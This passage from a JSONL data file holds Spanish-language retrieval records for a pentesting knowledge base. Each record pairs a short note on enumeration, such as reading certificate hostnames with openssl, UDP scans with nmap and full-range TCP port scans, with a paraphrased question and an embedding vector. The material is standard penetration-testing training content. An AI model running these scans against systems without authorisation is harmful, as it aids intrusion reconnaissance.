"v": [-0.14368, -0.04904, -0.05134, -0.0333, -0.12079, -0.35045, -0.09088, -0.09363, -0.03035, 0.10103, -0.2219, -0.01945, 0.03167, -0.15229, -0.02323, 0.12357, 0.02215, -0.08994, 0.02565, 0.11796, 0.01461, -0.18642, -0.00582, -0.1599, 0.0004, 0.02888, -0.01639, 0.0656, -0.00663, 0.04825, 0.04016, 0.07667, -0.00054, 0.099, 0.03907, 0.09087, -0.0718, 0.20913, -0.08015, -0.02462, -0.01596, -0.07949, 0.0446, 0.01491, 0.0061, -0.10209, 0.029, -0.05817, -0.01073, -0.06945, -0.04238, -0.1032, -0.15475, -0.11851, -0.1035, -0.00962, 0.01389, 0.03175, 0.05922, -0.02049, -0.068, -0.0614, -0.0484, -0.03814, 0.0306, 0.03191, 0.03335, 0.14602, -0.08019, -0.04371, 0.10154, 0.02365, -0.01538, -0.02634, -0.02519, -0.03185, 0.06886, 0.05064, 0.09457, 0.05485, 0.05962, 0.03094, 0.00271, -0.08411, -0.03412, 0.00046, -0.01871, -0.02144, -0.00095, -0.14047, 0.09821, 0.07617, 0.0494, -0.04536, -0.04181, -0.05126, -0.00806, -0.1528, -0.08652, -0.01776, -0.0177, 0.11238, -0.02915, -0.0062, 0.02775, 0.02387, 0.05285, -0.01495, 0.05474, -0.01017, 0.03316, -0.01543, -0.1484, -0.02006, 0.01192, -0.00456, -0.05756, -0.05849, 0.02601, -0.01647, -0.00816, -0.01399, -0.04347, -0.01986, -0.01628, 0.04798, -0.0658, 0.03838, -0.03676, 0.01721, -0.01114, -0.05113, -0.03664, -0.06703, 0.00787, 0.0346, 0.00025, -0.09099, -0.07036, 0.02502, -0.05088, 0.00575, 0.00986, 0.0048, 0.03901, -0.00803, -0.11315, -0.05764, -0.04791, -0.03867, -0.01362, 0.0634, 0.00045, 0.05443, -0.08268, 0.01646, 0.02432, -0.08157, -0.04994, 0.09693, -0.07546, -0.02936, -0.00393, 0.02606, -0.01989, 0.03772, 0.00294, -0.04747, -0.012, 0.00016, -0.02177, -0.02048, -0.00823, -0.08829, -0.00092, -0.01494, 0.04284, -0.00654, 0.06829, -0.00763, 0.00122, 0.05068, 0.01087, 0.01135, 0.04906, 0.0155, 0.03432, -0.03176, 0.08085, 0.01559, -0.00575, 0.05224, -0.02245, -0.00071, -0.05923, -0.0093, 0.00758, -0.02722, 0.04852, -0.05451, -0.01121, 0.00325, -0.01906, -0.00461, 0.05451, -0.0102, 0.00912, 0.05102, -0.05697, -0.00594, 0.06523, -0.0412, 0.07274, -0.06214, -0.03848, 0.01573, -0.05671, 0.03143, -0.01226, 0.01367, 0.03631, 0.03382, 0.00977, -0.00661, 0.05002, -0.01986, -0.01534, 0.01452, 0.00534, 0.03604, 0.02439, 0.02872, -0.06165, 0.02534, 0.09664, 0.0044, -0.0215, -0.04195, -0.05147, -0.02773, 0.00206, 0.02629, -0.05921, -0.01428, 0.00444, 0.01143, -0.07794, -0.05208, -0.05458, -0.03271, -0.02051, -0.04984, 0.02956, 0.00295, -0.02532, -0.01144]} +{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## HTTPS revela hostnames\n```bash\nopenssl s_client -connect IP:443\n```\n- El **certificado** te puede chivar el dominio real (CN / SAN).\n\nRelacionado: EnumeraciΓ³n web Β· Nmap Β· OSCP MOC", "indexar": "cΓ³mo se hace para descubrir el dominio real detrΓ‘s de una conexiΓ³n segura?", "v": [-0.10276, 0.08914, -0.24221, 0.00952, 0.0145, -0.08323, -0.0504, -0.04953, -0.09364, -0.0303, 0.03631, -0.07429, -0.05504, -0.15007, 0.07028, -0.00891, 0.12015, 0.0558, 0.00822, -0.09077, 0.07677, -0.08398, -0.07569, -0.09227, 0.11211, -0.11536, 0.09488, 0.07554, 0.03794, 0.02512, 0.07584, 0.01454, 0.03855, 0.04105, -0.11826, -0.04569, 0.0547, 0.05179, 0.10112, 0.01677, 0.06671, -0.08581, -0.05699, 0.13917, -0.05783, 0.01261, -0.05311, -0.15551, 0.02573, -0.13588, -0.12808, 0.02162, -0.10358, -0.10352, -0.0107, -0.10917, 0.02801, -0.05418, 0.08787, -0.04953, -0.11537, -0.08365, -0.01969, 0.09104, 0.0336, -0.11269, 0.0453, 0.03599, -0.01182, 0.00667, 0.03792, -0.05309, -0.0095, 0.08173, 0.01132, -0.06775, 0.14201, 0.00735, 0.09434, 0.08037, 0.04271, 0.10566, 0.00364, 0.03286, -0.10484, -0.03751, -0.04834, -0.12851, -0.00212, -0.05378, 0.05586, 0.08983, -0.10501, -0.05811, -0.08485, -0.04568, 0.06324, -0.1804, -0.12711, 0.02455, 0.04375, 0.08463, -0.11497, 0.04878, 0.05958, 0.06027, 0.03928, -0.08851, 0.00443, -0.01951, -0.05922, 0.00887, -0.08944, -0.02248, -0.0717, 0.06914, -0.04314, -0.0052, 0.01557, -0.11727, -0.09148, -0.00992, 0.023, -0.07316, 0.00115, -0.00191, -0.03901, -0.0023, 0.00787, -0.10485, -0.01155, -0.03071, -0.08299, -0.06612, 4e-05, 0.03797, -0.00266, -0.02694, -0.05236, -0.09803, 0.01377, 0.01656, -0.11453, -0.09189, -0.03909, -0.04359, -0.00749, -0.05554, -0.06524, 0.04827, -0.09847, 0.04066, -0.03395, 0.0147, 0.04506, 0.08248, -0.02459, -0.01861, -0.00082, 0.09772, 0.03054, 0.00293, -0.08357, -0.03744, 0.00702, -0.02482, -0.02691, -0.04477, 0.02386, 0.01738, -0.0192, 0.08527, 0.01016, -0.0043, -0.00365, 0.00717, 0.00741, -0.05808, 0.01336, -0.04621, -0.02068, -0.07069, 0.0464, 0.03634, -0.00756, 0.04734, 0.0615, 0.00511, -0.05761, 0.10283, -0.00492, -0.0069, -0.0202, 0.08769, -0.00728, -0.07434, 0.01691, -0.01577, -0.01521, -0.00664, -0.02139, -0.06937, 0.02782, -0.01358, 0.01813, -0.0278, -0.06753, 0.02562, -0.00107, -0.00489, 0.02201, -0.02532, 0.04947, -0.04439, -0.0235, -0.00882, -0.06066, 0.01845, -0.04201, -0.00328, -0.04004, 0.02524, -0.01214, -0.02711, 0.0444, -0.04168, -0.03594, 0.02091, -0.02067, 0.01663, -0.00078, 0.01664, -0.01811, 0.05266, 0.03858, 0.00329, 0.02367, -0.01254, -0.01975, -0.04803, 0.00193, 0.06023, -0.00527, -0.04993, -0.02916, -0.06292, -0.10582, 0.02305, -0.0233, -0.00141, -0.01228, -0.01227, 0.07082, 0.03238, 0.02106, -0.02697]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Puertos olvidados\n\n> Donde la gente pierde 4 horas: escanear solo el top-1000 TCP. Parte de Trampas de enumeraciΓ³n.", "indexar": "quΓ© herramienta sirve para hacer un escaneo profundo de puertos mΓ‘s allΓ‘ del top 1000?", "v": [-0.11014, -0.05358, -0.23526, 0.02603, 0.01277, -0.13128, 0.03083, -0.10444, -0.10517, -0.08068, -0.06278, 0.06051, 0.03454, -0.13051, 0.00906, -0.03655, 0.02051, -0.03181, 0.0583, 0.10162, -0.05394, 0.02085, -0.07117, -0.10371, 0.01957, -0.02328, -0.04708, 0.03478, -0.20032, 0.09533, -0.009, 0.13499, 0.03253, -0.08081, 0.0006, -0.1051, 0.02178, 0.01284, -0.00216, 0.05344, 0.01653, 0.09126, -0.03422, -0.06048, 0.05888, -0.0468, -0.03901, 0.01056, 0.07732, 0.05448, -0.07582, -0.13709, -0.08146, 0.01164, -0.03044, -0.07235, 0.08119, -0.00795, 0.04375, -0.16242, -0.108, 0.01233, -0.01714, -0.08248, -0.0822, -0.09149, -0.0462, -0.00653, 0.00866, 0.05545, -0.12519, 0.02893, 0.10098, 0.04458, -0.04479, -0.06205, 0.07129, 0.0462, 0.03382, 0.00587, 0.0943, 0.00742, -0.14551, -0.09717, -0.09537, -0.02906, -0.00631, 0.04924, 0.07837, -0.15783, -0.05816, 0.01855, -0.00968, 0.10466, -0.03271, 0.01721, 0.02813, -0.03419, -0.02394, 0.04843, 0.16777, -0.09107, -0.11263, 0.0154, 0.05931, 0.02849, -0.03996, -0.07096, 0.01046, 0.0743, 0.10199, 0.08406, -0.01452, -0.02277, -0.08617, 0.02765, -0.02751, -0.11552, -0.00778, 0.01008, 0.02385, -0.02222, -0.08106, -0.02297, -0.01433, 0.00238, -0.03815, 0.07677, 0.08818, -0.0334, 0.01454, -0.00173, -0.05491, 0.01294, -0.06617, -0.08614, 0.13204, -0.14073, 0.00765, -0.08901, -0.06753, 0.09016, -0.12239, -0.07803, -0.03135, 0.05256, 0.05896, -0.02314, -0.08495, -0.00575, 0.02646, -0.03506, -0.07535, 0.00991, -0.05641, 0.01239, 0.05017, -0.0258, -0.07263, 0.07995, 0.02081, -0.02502, 0.02224, 0.03514, 0.02671, -0.08048, -0.00474, 0.02616, -0.0085, 0.06196, -0.02058, 0.0257, -0.02663, -0.10358, 0.00354, 0.0165, 0.00544, -0.07288, -0.02904, -0.06891, -0.03629, 0.04684, 0.00743, -0.04441, -0.00832, -0.08129, -0.00675, -0.08855, -0.00687, 0.08152, -0.02605, 0.02772, -0.0258, -0.06393, 0.03276, -0.00995, 0.00858, -0.0482, 0.01334, -0.02184, 0.02796, 0.01963, 0.02583, -0.05015, 0.03333, 0.02506, -0.06991, -0.03888, 0.01763, 0.06178, -0.0261, 0.04184, 0.00372, 0.02802, -0.00553, -0.02471, -0.01672, 0.05824, 0.02483, 0.11056, -0.01171, -0.04049, -0.04839, -0.00548, -0.00084, 0.05694, 0.07273, -0.02287, 0.04745, 0.06457, 0.07074, -0.04244, -0.03265, -0.04703, -0.00277, 0.01014, -0.00875, -0.03513, -0.02893, -0.01743, -0.05542, 0.03168, 0.00444, -0.05036, -0.00863, -0.08557, -0.00294, 0.04607, -0.00078, -0.03702, -0.00685, -0.00904, 0.01219, -0.06573, 0.05415, -0.04418]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Puertos olvidados\n\n> Donde la gente pierde 4 horas: escanear solo el top-1000 TCP. Parte de Trampas de enumeraciΓ³n.", "indexar": "con quΓ© puedo montar una trampa de enumeraciΓ³n que no se limite a los primeros mil puertos?", "v": [0.08293, 0.08028, -0.1677, 0.02154, -0.07819, 0.10664, 0.13077, 0.02475, -0.21771, -0.11193, -0.01381, 0.22274, 0.24253, -0.01228, 0.04316, 0.03135, -0.07071, -0.00291, 0.1585, -0.05198, -0.04343, -0.1161, 0.02352, -0.08928, 0.011, -0.07182, -0.02171, -0.03315, -0.09696, 0.01117, -0.00801, 0.13465, 0.11158, -0.08089, 0.09942, -0.14114, 0.01262, -0.00121, 0.14304, 0.05753, 0.05741, 0.02088, -0.02959, -0.04754, 0.04345, -0.0177, -0.09263, 0.0017, 0.05934, -0.02177, -0.02221, 0.0494, -0.10342, -0.13255, -0.07025, -0.01426, 0.0963, -0.02482, 0.01451, -0.08238, -0.02903, 0.0753, 0.00826, -0.03532, -0.04921, -0.04789, -0.0185, -0.00146, -0.05455, -0.02794, 0.06493, -0.07914, -0.07645, 0.00752, -0.02703, -0.06493, -0.0068, -0.01453, 0.04003, 0.02591, 0.03941, -0.06928, -0.03847, -0.0543, -0.0104, -0.01953, -0.07643, 0.07049, 0.05349, -0.0092, 0.06184, 0.05611, 0.06334, 0.11249, -0.06948, -0.10511, 0.01602, 0.12013, -0.0259, 0.05261, -0.0094, 0.05419, -0.14555, 0.13504, 0.00133, 0.01819, 0.11104, -0.08557, 0.08671, -0.08965, 0.06748, 0.06218, -0.02278, -0.00932, -0.0279, -0.07993, -0.0411, -0.03623, -0.0236, -0.04165, -0.05941, -0.0101, -0.01445, 0.04638, 0.06646, -0.04128, 0.04088, 0.14724, 0.05616, 0.00417, 0.05714, 0.01999, -0.0124, -0.10128, -0.04844, 0.03564, 0.01228, -0.04878, -0.01759, 0.00634, -0.03682, 0.05282, -0.0878, -0.0507, 0.0143, 0.02226, -0.0372, -0.04455, -0.0662, -0.01265, -0.00407, 0.04505, -0.00114, 0.07067, -0.00681, 0.02912, 0.11454, 0.01735, 0.06457, 0.03473, 0.02686, -0.00797, -0.03786, 0.00187, 0.08067, -0.0435, -0.00851, 0.01108, 0.00574, -0.01172, -0.09189, 0.04136, -0.04666, 0.00654, 0.06763, 0.05186, -0.055, -0.02523, -0.02888, -8e-05, -0.01351, 0.03149, -0.04805, -0.00086, -0.07535, -0.07509, -0.02392, -0.07158, 0.01566, 0.15905, 0.00436, 0.03163, -0.06105, -0.01785, 0.01305, -0.06637, 0.03738, 0.06588, 0.01645, 0.00218, 0.02905, -0.00231, 0.01708, -0.01963, 0.03184, -0.01805, -0.08574, 0.08026, -0.00339, 0.07575, 0.02379, 0.01085, -0.03357, -0.02083, -0.049, 0.02023, -0.01633, 0.04688, -0.04061, 0.07278, 0.01039, 0.05261, -0.00747, 0.04386, -0.0478, -0.00054, 0.04692, 0.03889, 0.03996, 0.07645, -0.01028, -0.06573, -0.02195, -0.03678, 0.00519, -0.00099, 0.01625, 0.00577, -0.02554, 0.01526, 0.00109, 0.04075, -0.02569, -0.08438, 0.01128, -0.01055, -0.01447, 0.0585, 0.04693, -0.02257, 0.00241, -0.02807, 0.00772, -0.02619, 0.02469, -0.05662]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Puertos olvidados\n\n> Donde la gente pierde 4 horas: escanear solo el top-1000 TCP. Parte de Trampas de enumeraciΓ³n.", "indexar": "existe algΓΊn programa que ayude a evitar perder horas escaneando solo los puertos mΓ‘s comunes?", "v": [0.05151, 0.02464, -0.22565, 0.0572, 0.00092, -0.03476, 0.13016, -0.1431, -0.22386, -0.08517, -0.17719, 0.05038, 0.01816, 0.02293, 0.01082, -0.06521, 0.12375, 0.06715, 0.12683, 0.06848, -0.03548, 0.00828, 0.04236, 0.02473, 0.00992, 0.00816, -0.04323, -0.04638, -0.08804, -0.03724, -0.0494, 0.13801, 0.13978, -0.05253, 0.02666, -0.11886, 0.02809, -0.01732, 0.04053, -0.01373, 0.08061, 0.0423, -0.03545, -0.08158, 0.00503, -0.05677, -0.13925, 0.05408, 0.05774, -0.02111, -0.10105, 0.02567, -0.03391, -0.05635, -0.00235, 0.02814, 0.01497, 0.01175, -0.07315, -0.11479, -0.0278, 0.03127, 0.06101, -0.08547, 0.04073, -0.01065, 0.07959, 0.01716, -0.11699, 0.08136, -0.12345, 0.0055, 0.00621, 0.05884, -0.01943, -0.122, 0.01562, 0.0554, 0.04473, -0.0218, 0.01559, -0.0598, 0.02432, -0.00079, -0.10038, -0.14313, -0.0216, -0.05804, -0.04808, -0.08758, 0.05284, 0.0101, 0.03235, 0.10559, -0.00323, -0.00792, 0.10256, 0.08346, 0.04923, 0.10043, 0.03221, -0.04312, -0.02923, 0.08805, -0.01572, 0.08264, 0.1126, -0.06356, 0.0092, 0.06638, 0.02502, 0.01468, 0.0048, -0.11105, -0.06861, -0.02499, -0.00306, -0.08389, 0.03027, -0.03488, -0.03049, -0.04271, -0.03378, 0.04505, 0.05383, -0.0194, -0.00596, 0.06981, 0.01226, 0.06948, -0.05053, 0.02082, -0.03301, -0.06618, -0.15156, 0.00412, 0.02345, -0.03181, -0.0353, -0.03418, 0.00222, 0.08661, -0.07568, -0.03395, 0.01727, 0.06928, 0.01822, -0.06107, -0.11105, -0.0133, 0.02897, 0.07908, -0.03416, 0.03485, -0.03304, 0.05174, 0.10519, -0.0521, -0.02959, 0.05139, -0.02427, 0.07486, -0.07284, -0.09214, 0.07061, -0.06924, -0.03002, 0.02887, 0.03639, 0.0491, 0.01856, 0.13538, -0.00498, -0.16586, -0.01016, 0.00176, -0.03749, -0.13789, -0.01074, -0.01819, -0.06997, 0.09014, 0.03354, -0.00407, -0.01764, -0.05053, -0.08287, 0.00811, -0.0262, 0.04593, 0.03039, -0.00524, -0.06052, 0.01293, -0.00116, 0.02769, 0.03071, 0.01611, 0.04625, -0.02439, -0.04424, -0.0178, 0.04813, -0.0194, 0.04255, 0.073, -0.06999, 0.01012, 0.07989, 0.08371, 0.02881, -0.02294, 0.00352, -0.02864, 0.02585, 0.00409, 0.02355, 0.05123, 0.04896, 0.03149, -0.03137, 0.03602, 0.03249, 0.03962, -0.0073, -0.05681, 0.06709, 0.09535, 0.06854, 0.06861, 0.00419, -0.05075, -0.01735, -0.02787, 0.05107, 0.00734, 0.03496, -0.05791, 0.01115, -0.03581, 0.02194, 0.04286, 0.02165, -0.00847, -0.03588, -0.0106, -0.04618, 0.00121, 0.04559, 0.02713, 0.01789, 0.04948, 0.01275, -0.0492, 0.08016, -0.02913]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## UDP (casi siempre olvidado)\n```bash\nnmap -sU --top-ports 50 -T4 IP\n```\n- **SNMP (161)**, TFTP (69), NTP (123) suelen dar oro β†’ ver SNMP.", "indexar": "que programa puedo usar para escanear puertos UDP", "v": [0.01009, -0.1145, -0.17308, -0.1501, 0.10604, 0.03803, 0.14987, -0.15228, -0.12467, -0.02146, -0.10352, 0.04383, -0.04062, -0.1323, -0.2773, -0.15375, 0.01656, 0.01031, 0.06921, 0.01044, 0.0394, 0.04, -0.05917, -0.00031, -0.0087, 0.08828, -0.02973, -0.02303, -0.01702, -0.05121, 0.00722, 0.14459, 0.02333, -0.10305, 0.01226, -0.13548, 0.04194, -0.0421, 0.1834, 0.07571, 0.11304, 0.01891, -0.07372, -0.10417, 0.12632, 0.04534, -0.04153, 0.01445, 0.00209, -0.03857, -0.05581, 0.03621, -0.09048, 0.04299, -0.00529, -0.00178, 0.01027, 0.02719, -0.03133, -0.008, -0.02434, 0.08314, 0.00995, -0.03979, -0.01552, -0.032, 0.00597, 0.04431, -0.15083, 0.05237, -0.09023, 0.05057, 0.05311, -0.00838, -0.03713, -0.04413, -0.05129, -0.01031, 0.06792, 0.06707, -0.03679, -0.0272, -0.04087, 0.09951, -0.07667, -0.03726, 0.02706, -0.01954, 0.00261, -0.1225, -0.03572, -0.04796, 0.01758, 0.13467, 0.05721, -0.07974, 0.0273, 0.10253, -0.00678, 0.05832, 0.05051, 0.01155, -0.04693, 0.05945, -0.01606, 0.04472, 0.09032, -0.07512, 0.03069, 0.05365, 0.01487, 0.02415, -0.06955, -0.10785, -0.08209, 0.00262, -0.03271, -0.08697, 0.02077, -0.07122, -0.02527, -0.05991, -0.05245, -0.02781, 0.11709, 0.00549, 0.0384, 0.07732, -0.02816, 0.09319, 0.03729, -0.0172, -0.09453, -0.04801, -0.0979, -0.08717, 0.00176, -0.06799, 0.01857, 0.00973, -0.07271, 0.10078, -0.07276, 0.01319, 0.01027, 0.02138, -0.03844, -0.06366, -0.0043, -0.04144, 0.07793, 0.00311, -0.07658, 0.01217, -0.05506, -0.00791, 0.10176, -0.02577, -0.08311, 0.03515, -0.0703, -0.01956, -0.05401, -0.0193, 0.0884, -0.07971, 0.00175, 0.05323, -0.00095, 0.0232, 0.01525, 0.14487, 0.01689, -0.07755, 0.02668, -0.00697, -0.02588, -0.05986, -0.02729, 0.00523, -0.08591, 0.07683, 0.02104, -0.04604, -0.00485, -0.0418, -0.00514, -0.03096, 0.01012, 0.02773, -0.04429, 0.05505, 0.03784, -0.02342, -0.03533, 0.01218, 0.03595, 0.01152, 0.01987, -0.05759, -0.00117, 0.03257, 0.02503, -0.06976, 0.0623, 0.04502, -0.06226, 0.04267, 0.04646, 0.08655, -0.00012, -0.05676, 0.04587, -0.00092, 0.00207, -0.00415, -0.06347, 0.07792, 0.07013, 0.05063, -0.05196, 0.03772, -0.01856, 0.06194, -0.02435, -0.05257, 0.01866, 0.01865, 0.03752, 0.0343, 0.02721, -0.01514, -0.05283, -0.07757, 0.00413, -0.00639, -0.03983, 0.01989, -0.01194, -0.02501, -0.00546, 0.02487, 0.02603, -0.00715, 0.03026, -0.02005, -0.05196, 0.034, 0.03962, 0.04484, 0.01876, 0.06512, 0.00437, -0.05274, 0.0174, 0.03048]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## UDP (casi siempre olvidado)\n```bash\nnmap -sU --top-ports 50 -T4 IP\n```\n- **SNMP (161)**, TFTP (69), NTP (123) suelen dar oro β†’ ver SNMP.", "indexar": "con que herramienta detecto servicios como SNMP o NTP", "v": [-0.05795, -0.05037, -0.19004, -0.25682, 0.00323, -0.1147, -0.18577, -0.02274, -0.08144, 0.14788, -0.09557, 0.07244, 0.10189, -0.12732, -0.08736, 0.12954, -0.00877, -0.26246, 0.12961, 0.11366, -0.1249, 0.0089, -0.01959, -0.02385, 0.00977, 0.04328, 0.02704, -0.02659, -0.14075, 0.10865, -0.03684, -0.06934, -0.06722, -0.0596, -0.09637, -0.03673, 0.00967, 0.02472, -0.00253, 0.01584, -0.00784, -0.0356, -0.00485, 0.03856, 0.05942, 0.06425, -0.03796, -0.04142, 0.00806, 0.08516, -0.03976, -0.02069, -0.20129, -0.04065, -0.13967, -0.05946, 0.09541, 0.00895, 0.02992, -0.09174, -0.05264, 0.02949, -0.08018, -0.12992, -0.02341, -0.1064, 0.01372, -0.0714, -0.03531, -0.0214, -0.04417, -0.00533, 0.07565, 0.05333, -0.01366, -0.00412, 0.00491, -0.01296, 0.11912, 0.01459, 0.07326, 0.02638, -0.15347, 0.00757, -0.12327, -0.05666, 0.08942, 0.00543, -0.01244, -0.0774, -0.02148, 0.13998, 0.01795, 0.08398, 0.01982, -0.01258, 0.11377, -0.14589, 0.06088, -0.02534, 0.17739, 0.04824, -0.12017, 0.02974, -0.00501, -0.04795, 0.06797, 0.06904, -0.03595, -0.00722, 0.02098, 0.0004, -0.02577, -0.03119, 0.01561, -0.00785, -0.00046, -0.03211, -0.02803, -0.04625, 0.01567, 0.02948, -0.0569, -0.0399, 0.00559, -0.03894, -0.01588, -0.00584, 0.05454, -0.04419, -0.01307, -0.0387, -0.10893, -0.00303, 0.01442, -0.03387, 0.01355, -0.07893, -0.00392, 0.00643, 0.02162, -0.01844, 0.0197, -0.08276, -0.01797, -0.04367, -0.00269, 0.00484, -0.02533, 0.05482, 0.01561, -0.02977, -0.06262, -0.02064, -0.02836, -0.00089, 0.00697, -0.01021, -0.08067, 0.04312, -0.07787, -0.07155, 0.084, 0.04074, 0.04696, 0.03078, 0.01253, 0.01009, 0.02899, -0.04835, -0.02721, -0.01705, 0.03296, -0.02493, -0.02351, -0.06825, -0.03409, -0.04426, 0.06244, -0.07131, -0.04848, 0.00547, -0.01507, -0.02766, 0.02819, -0.02645, 0.0168, -0.07266, 0.00194, -0.01633, -0.00826, 0.00912, 0.00932, 0.02043, -3e-05, -0.04491, 0.00668, -0.05127, -0.00672, 0.01045, -0.07531, -0.00675, -0.07967, -0.03617, -0.05075, 0.00748, 0.0068, 0.05341, -0.00393, 0.02054, 0.0079, -0.02655, 0.05265, -0.05281, 0.00224, -0.03186, -0.00083, 0.05447, -0.00835, 0.04624, 0.00695, -0.00611, 0.0299, -0.03017, -0.08135, -0.05972, -0.00066, 0.04013, 0.06349, -0.03107, 0.04532, -0.02261, -0.00402, -0.04358, 0.04165, -0.04155, 0.01013, -0.01313, -0.02583, -0.02373, 0.01263, 0.00543, -0.00986, -0.01868, -0.02247, -0.00021, 0.0007, -0.03156, 0.01838, -0.02862, 0.01939, 0.00578, 0.0771, -0.04431, -0.00218, -0.03812]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## UDP (casi siempre olvidado)\n```bash\nnmap -sU --top-ports 50 -T4 IP\n```\n- **SNMP (161)**, TFTP (69), NTP (123) suelen dar oro β†’ ver SNMP.", "indexar": "cual es una alternativa libre al comando nmap para escaneo UDP", "v": [-0.16835, -0.11293, -0.10357, -0.08101, -0.01864, 0.03902, -0.03826, 0.0055, -0.274, 0.0646, -0.04623, -0.13526, -0.02405, -0.14447, -0.20003, -0.04508, 0.0139, -0.01418, 0.10068, 0.05219, -0.03263, 0.07899, -0.02938, 0.00867, 0.0164, 0.02927, -0.07722, 0.08452, -0.06487, -0.07171, 0.03977, 0.089, -0.03561, -0.10953, 0.01134, 0.08967, 0.13388, -0.05834, 0.11525, 0.10529, -0.08638, -0.00292, -0.14518, -0.02144, 0.03392, -0.05257, -0.07407, 0.0406, 0.02312, 0.01924, -0.07432, 0.02376, -0.09103, 0.00365, 0.02064, 0.04024, 0.12299, -0.0103, 0.02091, 0.01193, -0.13528, 0.01116, 0.01953, -0.01977, -0.07729, 0.0087, -0.08116, -0.1291, -0.07563, 0.0416, -0.03884, -0.00015, 0.00283, -0.02315, -0.11597, -0.01417, -0.0755, -0.03985, 0.10542, 0.02977, 0.00208, -0.02725, -0.144, 0.10081, -0.10819, -0.10662, 0.07588, -0.06164, -0.04749, 0.05077, -0.00047, -0.03231, 0.02985, 0.14341, 0.08984, -0.05518, -0.03058, 0.09001, 0.04411, 0.11703, 0.04067, 0.04009, -0.17993, 0.05267, 0.04123, 0.05102, 0.04548, 0.03577, -0.05129, 0.11007, -0.01444, 0.03252, -0.04399, -0.01696, 0.02717, -0.10098, -0.02968, -0.01943, -0.01384, -0.08867, -0.08993, -0.02239, -0.00835, 0.01451, 0.04885, 0.03474, 0.01739, -0.02981, 0.04496, 0.09293, 0.01898, -0.01836, -0.05942, -0.06686, -0.08182, 0.01464, 0.06647, -0.01746, -0.01107, 0.01644, -0.08723, 0.06688, -0.02018, -0.04004, 0.00918, -0.01897, 0.02826, -0.07473, 0.03998, -0.0003, -0.01321, 0.0368, -0.08202, 0.06367, -0.01285, -0.00549, -0.08837, -0.00223, -0.03865, 0.08744, 0.00452, -0.0788, -0.02787, 0.06734, 0.00902, -0.05063, -0.01646, 0.00061, -0.11446, -0.058, -0.00602, 0.07897, 0.05817, -0.05629, 0.04521, -0.08894, 0.02173, -0.07634, 0.03196, 0.014, -0.00146, 0.07517, -0.03748, -0.01483, -0.00276, -0.05131, -0.00382, 0.00536, 0.01507, -0.00288, -0.0169, 0.075, -0.01241, -0.09986, -0.03801, 0.00526, 0.0582, -0.07924, -0.01494, -0.01943, -0.09421, 0.03665, -0.00249, -0.05973, -0.04095, -0.08067, -0.02774, 0.09098, -0.00589, 0.01662, 0.03058, 0.0107, 0.07702, 0.00065, -0.01878, -0.02711, -0.03746, 0.0145, -0.00022, -0.01395, 0.02656, 0.03405, 0.03214, -0.02167, -0.05594, -0.00488, -0.0232, -0.01037, 0.06338, 0.01991, 0.00609, -0.00805, 0.0025, -0.01123, 0.02653, -0.00898, -0.00213, 0.07428, 0.01987, 0.01685, 0.04325, 0.04625, -0.03086, -0.03588, -0.02794, -0.04739, -0.08651, 0.01814, -0.02766, 0.01499, 0.02248, 0.03567, -0.02992, -0.00281, -0.01719, 0.00166]} +{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Puertos altos TCP\n```bash\nnmap -p- --min-rate=5000 IP # los 65535, no solo top-1000\n```\n- Servicios escondidos en puertos raros (8080, 50000+...).", "indexar": "que programa puedo usar para escanear todos los puertos TCP desde 1 hasta 65535?", "v": [-0.00685, -0.12087, -0.18008, -0.02288, 0.05976, -0.14929, 0.16751, -0.08812, -0.07599, 0.05085, -0.13936, 0.12029, 0.07078, -0.04564, -0.11912, -0.08036, -0.02739, -0.01378, 0.16345, 0.0319, 0.02461, -0.01539, -0.03557, -0.08023, 0.09148, 0.14268, -0.01306, -0.06854, -0.043, -0.04373, 0.00947, 0.07427, 0.08965, 0.02797, 0.05632, -0.06943, 0.02968, -0.03999, 0.04757, 0.08145, 0.10764, 0.00265, -0.07748, -0.0735, 0.13801, 0.04039, 0.02002, -0.00522, -0.02223, -0.04113, -0.08902, -0.0909, -0.06411, 0.04067, -0.09799, -0.07034, 0.0105, 0.02577, -0.06728, -0.05854, 0.05731, 0.07855, -0.06689, -0.12116, -0.03952, -0.03851, 0.0037, 0.06288, -0.13156, 0.07361, -0.11091, 0.07068, -0.02582, 0.02483, 0.06536, -0.0788, -0.01281, 0.00575, 0.07565, 0.00274, 0.00618, -0.0449, -0.04783, -0.02297, -0.15954, -0.04325, 0.03873, -0.0316, 0.03249, -0.0624, 0.00955, 0.00841, 0.08824, 0.15541, 0.05085, -0.08323, 0.02252, 0.06197, 0.02562, -0.0065, 0.09416, 0.03119, -0.02742, 0.07261, -0.04044, 0.0379, 0.11304, -0.1077, 0.01582, 0.03638, -0.00679, 0.04359, -0.03594, -0.0654, -0.11157, 0.02702, -0.01787, -0.02616, 0.07472, -0.07273, -0.04235, -0.00433, -0.01303, 0.03859, 0.14036, 0.00519, -0.00285, 0.11052, 0.01957, 0.10118, 0.01376, 0.03528, -0.08516, -0.07422, -0.06875, -0.0958, -0.01391, -0.09092, 0.02131, -0.00111, 0.02885, 0.09774, 0.02763, 0.03523, 